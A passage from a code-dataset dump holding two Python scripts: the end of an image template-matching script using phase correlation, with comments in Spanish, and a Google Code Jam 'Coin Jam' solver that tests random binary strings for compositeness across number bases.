RATIO A MANTENER\nks = np.linspace(0.9, 1, num=20) # FACTOR DE ESCALA\n\nfor k in ks: # PARA CADA FACTOR DE ESCALA\n tmp = cv2.resize(templates[0],\n (np.int(img.shape[0]*k),\n np.int(img.shape[0]*k*ar))) # CONSIGO UN TEMPLATE MANTENIENDO EL ar\n tmp_fft = np.fft.fft2(tmp, (img.shape[0], img.shape[1])) # FFT \n result = np.abs(np.fft.ifft2((img_fft*tmp_fft)/np.abs(img_fft*tmp_fft))) # PHASE CORRELATION\n maxima.append(np.amax(result)) # AGREGO EL MAXIMO A LA LISTA\n#%%\nargmaximum = np.argmax(maxima) # ENCUENTRO EL INDICE DEL FACTOR DE ESCALA QUE DIO MEJOR\nprint(ks[argmaximum])\ntmp = cv2.resize(templates[0], \n (np.int(img.shape[0]*ks[argmaximum]),\n np.int(img.shape[0]*ks[argmaximum]*ar))) # EXTRAIGO ESE TEMPLATE\ntmp_fft = np.fft.fft2(tmp, (img.shape[0], img.shape[1])) # FFT\nresult = np.abs(np.fft.ifft2((img_fft*tmp_fft)/np.abs(img_fft*tmp_fft))) # PHASE CORRELATION\nplt.figure()\nplt.imshow((result>=maxima[argmaximum])) # MUESTRO SU UBICACION\n#%% MOVE TEMPLATE TO LOCATION\na, b = np.unravel_index(result.argmax(), result.shape)\nprint(a, b)\n#%%\nfinal_template = np.zeros((img.shape[0], img.shape[1]))\nfinal_template[a-tmp.shape[0]:a, b-tmp.shape[1]:b] = tmp\nplt.figure()\nplt.imshow(img+final_template)\n\n\n\n# tenemos 3 templates\n# iteramos sobre los templates por la imagen con phase correlation\n# tambien cambiamos el tamanio del template\n","sub_path":"master/UTE/oldies/character_detection2.py","file_name":"character_detection2.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"25578678","text":"__author__ = 'Yassien'\r\n\r\ndef readTestCaseFile(fileName):\r\n inputLines = []\r\n cases =[]\r\n with open(fileName, 'r') as fp:\r\n for line in fp:\r\n number = line.split('\\n')\r\n inputLines.append(number)\r\n numCases = inputLines[0][0]\r\n numCases = int(numCases)\r\n index = 1\r\n for i in range(numCases):\r\n line = inputLines[index]\r\n line = str(line[0])\r\n numbers = []\r\n tempNumber = \"\"\r\n for ch in line:\r\n if ch != \" \":\r\n tempNumber = tempNumber + ch\r\n else:\r\n if tempNumber !=\" \":\r\n numbers.append(int(tempNumber))\r\n tempNumber = \"\"\r\n\r\n if tempNumber !=\" \":\r\n numbers.append(int(tempNumber))\r\n cases.append(numbers)\r\n index = index + 1\r\n return cases\r\n\r\ndef writeOutput(destDirectory,results):\r\n\r\n fileName = destDirectory+\"results.txt\"\r\n filehandle = open(fileName,'w')\r\n index = 1\r\n for res in results:\r\n filehandle.write(\"Case\")\r\n filehandle.write(\"\\t\")\r\n filehandle.write(\"#\"+str(index)+\":\")\r\n filehandle.write(\"\\n\")\r\n coins = res[1]\r\n for coin in coins:\r\n jam = coin[0]\r\n numbers = coin[1]\r\n filehandle.write(str(jam))\r\n filehandle.write(\"\\t\")\r\n for num in numbers:\r\n filehandle.write(str(num))\r\n filehandle.write(\"\\t\")\r\n filehandle.write(\"\\n\")\r\n\r\n index = index + 1\r\n\r\n return\r\ndef convertNumIntoDigits(N):\r\n number = str(N)\r\n digits = []\r\n for ch in number:\r\n if ch != \" \":\r\n digits.append(int(ch))\r\n return digits\r\ndef interpretToNumber(digits,base):\r\n '''\r\n number = 0\r\n index = 0\r\n for digit in digits:\r\n number = number + digit*(base**index)\r\n index = index + 1\r\n '''\r\n decimal = 0\r\n for digit in digits:\r\n decimal = decimal*base + int(digit)\r\n return decimal\r\ndef factors(n):\r\n currentDivisor = 1\r\n done = 0\r\n while n > 1:\r\n for i in range(2, int(n) + 1):\r\n if n % i == 0:\r\n n /= i\r\n currentDivisor = i\r\n done = 1\r\n break\r\n if done:\r\n break\r\n return currentDivisor\r\ndef is_JetCoin(case):\r\n nonTrivialDivisors = []\r\n tempConverted = []\r\n index = 2\r\n digits = convertNumIntoDigits(case)\r\n if len(digits)>1:\r\n if digits[0] ==0 or digits[len(digits)-1] == 0:\r\n return 0\r\n ret = 1\r\n for i in range(9):\r\n base = index\r\n print(case)\r\n #number = int(case, base)#interpretToNumber(digits,base)\r\n #digits = convertNumIntoDigits(case)\r\n #number = interpretToNumber(digits,base)\r\n number = int(case, base)\r\n #print(\"converted\")\r\n #print(number)\r\n #print(\"after factor\")\r\n isPrime = is_prime(number)\r\n #print(\"After prime\")\r\n #print(isPrime)\r\n if isPrime== 1:\r\n ret = 0\r\n break\r\n else:\r\n #print(\"start Factorizing\")\r\n #nonTrivialDivisors.append(factors(number))\r\n tempConverted.append(number)\r\n #print(\"End Factorizing\")\r\n index = index + 1\r\n if ret == 1:\r\n for num in tempConverted:\r\n nonTrivialDivisors.append(factors(num))\r\n return ret,nonTrivialDivisors\r\nimport math\r\ndef is_prime(n):\r\n if n % 2 == 0 and n > 2:\r\n return False\r\n return all(n % i for i in range(3, int(math.sqrt(n)) + 1, 2))\r\n\r\nfrom random import randint\r\n\r\ndef generateRandomBit():\r\n return randint(0,1)\r\n\r\ndef generateCoinJam(N):\r\n JamCoinNumber = \"1\"\r\n for i in range(N-2):\r\n JamCoinNumber = JamCoinNumber+ str(generateRandomBit())\r\n JamCoinNumber = JamCoinNumber+ \"1\"\r\n return JamCoinNumber\r\ndef solveCoinJamCase(case):\r\n if len(case) > 1:\r\n N = case[0]\r\n J = case[1]\r\n numSuccessfulCases = 0\r\n solutions = []\r\n while numSuccessfulCases
(([A-Fa-f0-9]{2}){4})